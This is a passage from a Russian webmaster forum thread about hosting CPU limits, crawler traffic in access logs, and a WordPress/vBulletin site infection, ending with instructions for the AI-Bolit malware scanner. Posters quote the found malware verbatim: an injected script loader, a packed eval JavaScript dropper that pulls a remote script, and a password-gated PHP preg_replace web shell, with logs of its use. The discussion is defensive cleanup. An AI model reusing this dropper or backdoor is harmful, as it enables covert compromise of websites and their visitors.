AAAAllleex

AVGURO-NET думаю, это и есть jino (хостер) у них так юр. лицо называется.

Зарегистрирован на физика в Киеве. Можа какой тамошний поисковый бот. Только его если блокирнуть.

---------- Добавлено 14.02.2015 в 21:05 ----------

Хостер в очередной раз отписался:

Ким Эдуард 14.02.2015 17:45

Здравствуйте.

На аккаунте регистрируется нагрузка на процессор сервера:

https://cp-hosting.jino.ru/statistics/resources/chart/cpu/week/2015-02-14/

При общей нагрузке на аккаунт могут наблюдаться проблемы с доступом ко всем сайтам, расположенных на нём.

Öèòàòà:

На сколько ограничение? Это предусмотрено договором?

Можно ли получать уведомления об ограничении и снятии ограничений?

Ограничения по нагрузке указаны в публичной оферте:

http://www.jino.ru/buy/offer.html

Для стандартного аккаунта уделяется 10% от общей процессорной мощности. Ограничения постоянны и не снимаются, в целях стабилизации работы сервера.

На сайте pravogroup.ru регистрируется большое количество запросов из сети Яндекса:

https://cp-hosting.jino.ru/statistics/logs/access/pravogroup.ru/

Данные запросы создают нагрузку. Мы добавили в файл robots.txt директиву "Crawl-delay: 60" для снижение частоты запросов.

Öèòàòà:

Укажите, пожалуйста, в логе хотя бы 1 фрагмент, который указывает на злонамеренность посетителя, чтобы мы его могли блокировать.

На сайте arbitraz.ru было замечено большое количество запросов из зарубежных подсетей:

https://cp-hosting.jino.ru/statistics/logs/access/arbitraz.ru/

Öèòàòà:

144.76.29.162 - - [14/Feb/2015:11:47:57 +0300] "GET /novosti/347.htm?mode=threaded HTTP/1.0" 301 -

208.115.113.88 - - [14/Feb/2015:11:48:00 +0300] "GET /calendar.php?do=add&c=1&day=2013-3-29 HTTP/1.0" 200 30158

148.251.124.174 - - [14/Feb/2015:11:48:07 +0300] "GET /post_thanks.php?do=findthanks_user_gave&u=643 HTTP/1.0" 200 26343

144.76.29.162 - - [14/Feb/2015:11:48:33 +0300] "GET /novosti/347.htm HTTP/1.0" 404 19444

208.115.113.88 - - [14/Feb/2015:11:48:59 +0300] "GET /calendar.php?do=add&c=1&day=2013-12-23 HTTP/1.0" 200 30162

148.251.124.174 - - [14/Feb/2015:11:49:04 +0300] "GET /post_thanks.php?do=findthanks_user_gave&u=658 HTTP/1.0" 200 26339

144.76.29.162 - - [14/Feb/2015:11:49:32 +0300] "GET /novosti/348.htm?mode=hybrid HTTP/1.0" 301 -

148.251.124.174 - - [14/Feb/2015:11:50:53 +0300] "GET /post_thanks.php?do=findthanks_user_gave&u=6671 HTTP/1.0" 200 26343

144.76.29.162 - - [14/Feb/2015:11:52:09 +0300] "GET /novosti/348.htm HTTP/1.0" 404 19450

Мы произвели блокировку адресов, с которых поступали однотипные запросы, которые могли создавать нагрузку.

Цитировать

Статус заявки изменён на «Требуется ваш ответ» (14.02.2015 17:45, Ким Эдуард)

Удивительно. Спасибо jino. К сожалению скорость пока не нормализовалась.

Топ 100 обращающихся. Ничего криминального.

За что меня так любит яндекс.

178.154.150.209 33654 YANDEX

37.140.141.37 4560 YANDEX

81.177.140.52 3399 AVGURO-NET

5.45.254.227 1421 YANDEX

37.140.141.36 773 YANDEX

176.102.37.87 578 UKRAINE

38.111.147.84 455 Oakland

5.45.254.225 292 YANDEX

157.55.39.98 264 Microsoft Corporation

37.140.141.38 244 YANDEX

157.55.39.70 223 Microsoft Corporation

157.55.39.137 196 Microsoft Corporation

207.46.13.120 178 Microsoft Corporation

5.45.254.226 113 YANDEX

217.69.133.216 102 MAIL-RU

217.69.133.84 92

95.108.129.207 90

217.69.133.218 87

213.180.206.197 85

37.9.118.17 85

217.69.133.217 84

217.69.133.85 84

217.69.133.215 83

66.249.64.21 81

66.249.78.245 73

217.69.133.219 72

217.69.133.67 72

66.249.64.29 71

66.249.78.252 70

66.249.64.25 69

188.165.15.191 65

157.55.39.69 65

157.55.39.136 65

66.249.78.238 63

46.161.41.199 58

188.165.15.78 57

188.165.15.94 57

188.165.15.98 56

188.165.15.121 55

188.165.15.188 54

188.165.15.50 52

188.165.15.10 49

188.165.15.105 45

54.235.100.22 45

188.165.15.234 43

54.235.94.95 43

188.165.15.208 42

178.32.149.16 40

66.249.69.77 39

66.249.69.93 32

54.235.98.169 30

213.180.206.205 29

37.140.141.40 27

66.249.64.22 27

66.249.64.30 27

193.189.117.243 26

123.126.113.104 25

199.16.156.124 25

46.39.235.82 25

157.55.39.122 24

95.167.189.100 23

199.16.156.125 23

178.154.224.114 22

95.167.189.77 22

64.187.238.122 22

66.249.69.61 21

86.184.212.38 21

199.16.156.126 21

176.103.152.28 20

66.249.79.62 19

37.115.202.31 18

54.235.99.68 18

148.251.138.201 17

95.108.128.241 17

66.249.64.26 17

23.21.82.184 16

95.167.189.66 16

100.43.90.12 16

54.235.97.10 15

5.255.253.4 14

66.249.79.70 14

74.125.176.149 13

91.121.163.214 12

66.249.79.78 12

74.125.176.147 11

80.252.18.27 11

146.0.77.95 10

178.154.243.110 10

185.3.149.130 10

178.154.243.108 10

141.105.66.179 9

37.57.231.240 9

82.145.221.216 9

217.118.79.27 9

74.125.176.150 8

199.59.148.209 8

146.0.79.23 8

146.0.74.206 8

2.93.204.176 8

В файле ip_nagruzka140215.txt приведены ip на максимальных нагрузках 14.02.15 (пики_нагрузок140215.doc).

Нагрузку создают поисковые роботы. Или я не прав?

В свое время делал сервера на Debian и Ubuntu. Ничего сложного, если ставить www, почту, php и mysql, привязать к ndis и пробросить порты через роутер. Делал по мануальчику пару дней потратил.

В очередной раз озадачился этим вопросом из-за проблем с хостером jino - ограничивает скорость доступа при увеличении нагрузки.

Видимо скоро займусь. Буду рад хорошему мануалу с современными плюшками.

Очередное заражение

В файл navigation.js дописали:

document.write("<scr"+"ipt src='/wp-includes/js/mediaelement/candy.js'><"+"/script>");

и добавили файл:

wp-includes/js/mediaelement/candy.js

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 p(f){7(f).o("").n().r("")}5 b(d){k(3.j&&3.a){2 8=3["a"](\'s\')[0];2 4=3.j(\'t\');4.g(\'m\',"l/q");4.g(\'A\',d);8["C"](4)}}2 c="D://u.E.F/B";2 e="w";2 6=v["x"]["y"]();5 9(){7 6["h"](e)!=-1}5 i(){7 6.h("z")==-1}k(i()&&9()){b(c)}',42,42,'||var|document|HHHHVjwZ|function|JvvUnzHH|return|OWEV|jOYumjF|getElementsByTagName|LYXg|dbiq|sTXIqbf|fiJEYWgF|wzvPUChl|setAttribute|indexOf|KpkcHax|createElement|if|text|type|reverse|split|bXKzI|javascript|join|head|script|arreup|navigator|win|userAgent|toLowerCase|chrome|src|2832e2284ebcc386cd95d24cb037a953c9c8a4d04eabf0876b9349044f12b296b3aa647e68b0213fed1f15848a89b02310ad5905681726066009a3cb4baa35d6e190a962788e72bc41ff155027edf37571273924d8b9427a48e6a2222ab00281cb731057ea6ccc4195ca2f116cae5a2bd86613df|appendChild|http|pp|ua'.split('|'),0,{}))

в файле wp-includes/SimplePie/config.inc.php:

<?php

if (md5($_POST['p']) == 'bf4400fd188a7fca6c65cbb3e5b2d711') {

preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);

}

Вот лог использования файла:

5.39.47.1 [20/Jan/2014:01:26:54 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 2

5.39.47.1 [20/Jan/2014:01:26:54 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 51

5.39.47.1 [20/Jan/2014:01:26:55 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 213

5.39.47.1 [20/Jan/2014:01:26:59 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 52

5.39.47.1 [20/Jan/2014:16:06:33 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 2

5.39.47.1 [20/Jan/2014:16:06:33 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 65

5.39.47.1 [20/Jan/2014:16:06:34 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 218

5.39.47.1 [20/Jan/2014:16:06:35 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 52

5.39.47.1 [20/Jan/2014:21:30:42 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 2

5.39.47.1 [20/Jan/2014:21:30:42 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 51

5.39.47.1 [20/Jan/2014:21:30:42 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 214

5.39.47.1 [20/Jan/2014:21:30:45 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 52

Можно пошагово, как подгрузили и как выявили вредоносность?

---------- Добавлено 14.01.2014 в 02:01 ----------

Еще раз большое спасибо.🍻🍻

Ну не совсем, удалил несколько левых php и swf.

За это отдельное спасибо 🍻🍻🍻😎😎😎

Ссылается он на еще один .js:

/images/regimage/backgrounds/reel.js

Пока не удаляю, пытаюсь понять как его обнаружили.

Firebug на вкладке скрипты показывает:

<link rel="stylesheet" type="text/css" href="clientscript/vbulletin_important.css?v=387" />

<script type="text/javascript" src="clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=387"></script>

<script type="text/javascript" src="clientscript/yui/connection/connection-min.js?v=387"></script>

<script type="text/javascript">

и не ругается.

Про vbulletin_md5.js не пишет вообще.

Каким средством это можно обнаружить?

www.siteguard.ru

Ругается еще на 3 скрипта, прав ли он, что думаете, господа?

<script type="text/javascript"><!-- window.google_analytics_uacct = 'UA-39617615-1'; var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-39617615-1'], ['_setVar', 'usergroup-1-Unregistered / Not Logged In'], ['_gat._anonymizeIp'], ['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); //--></script>

<script type="text/javascript"> var _tbdef = {user: 'arbitraz.ru'}; (function(){ var d = document;var tbjs = d.createElement('script'); tbjs.type = 'text/javascript'; tbjs.async = true; tbjs.src = 'http://tweetboard.com/tb.js'; var tbel = d.getElementsByTagName('body')[0]; if(!tbel) tbel = d.getElementsByTagName('head')[0]; tbel.appendChild(tbjs); })(); </script>

<script type="text/javascript"> //<![CDATA[ window.orig_onload = window.onload; window.onload = function() { if (is_ie || is_moz) { var cpost=document.location.hash;if(cpost){ if(cobj = fetch_object(c********bstring(1,cpost.length)))cobj.scrollIntoView(true); }} if(typeof window.orig_onload == "function") window.orig_onload(); } //]]> </script>

---------- Добавлено 13.01.2014 в 07:11 ----------

Отож. У меня Avast перестал ругаться.

Вы то как обнаружили, что эксплоиты подгружаются?

Вы разработали своё ПО?

Почему вы решили, что если разработчику айболита заказать работу по безопасности он не справится?

ИМХО скрипт выполняет общие задачи и панацеей не может являться по определению.

Тут народ на хостеров грешит. Однако, всё может быть.

Всё хорошо.

Вы так и не сказали как нашли:(:(

Да. Экспресс метод. Полный метод через SSH не получается запустить:

Error: cannot run on php-cgi. Requires php as cli

See FAQ: http://revisium.com/ai/faq.php

В факе ничего об этой ошибке.

Работал по этому мануалу

кспресс-проверка (не рекомендуется):

-------------------------------------

1. в файле /ai-bolit/ai-bolit.php найти строку

define('PASS', '....

Вписать во вторых апострофах пароль, например mypass6.

define('PASS', 'MyPass234');

2. скопировать из папки /ai-bolit/ файлы на сервер в корневой каталог

3. скопировать из папки know_files файлы, которые соответствуют вашей cms (если таких файлов нет, то ничего страшного)

4. открыть в браузере http://ваш_сайт/ai-bolit.php?p=MyPass234 и ждать отчета

5. после отображения отчета удалить файлы от айболита и сам скрипт с сайта

Если что-то пошло не так, читаем FAQ: http://revisium.com/ai/faq.php

Полная проверка (рекомендуется):

--------------------------------

1. скопировать из папки /ai-bolit/ файлы на сервер в корневой каталог

2. скопировать из папки know_files файлы, которые соответствуют вашей cms (если таких файлов нет, то ничего страшного)

3. подключиться к серверу по ssh, перейти в папку сайта

4. выполнить команду в командной строке

php ai-bolit.php

5. дождаться окончания сканирования

6. скопировать с сервера файл AI-BOLIT-REPORT-<дата>-<время>.html

Если что-то пошло не так, читаем FAQ: http://revisium.com/ai/faq.php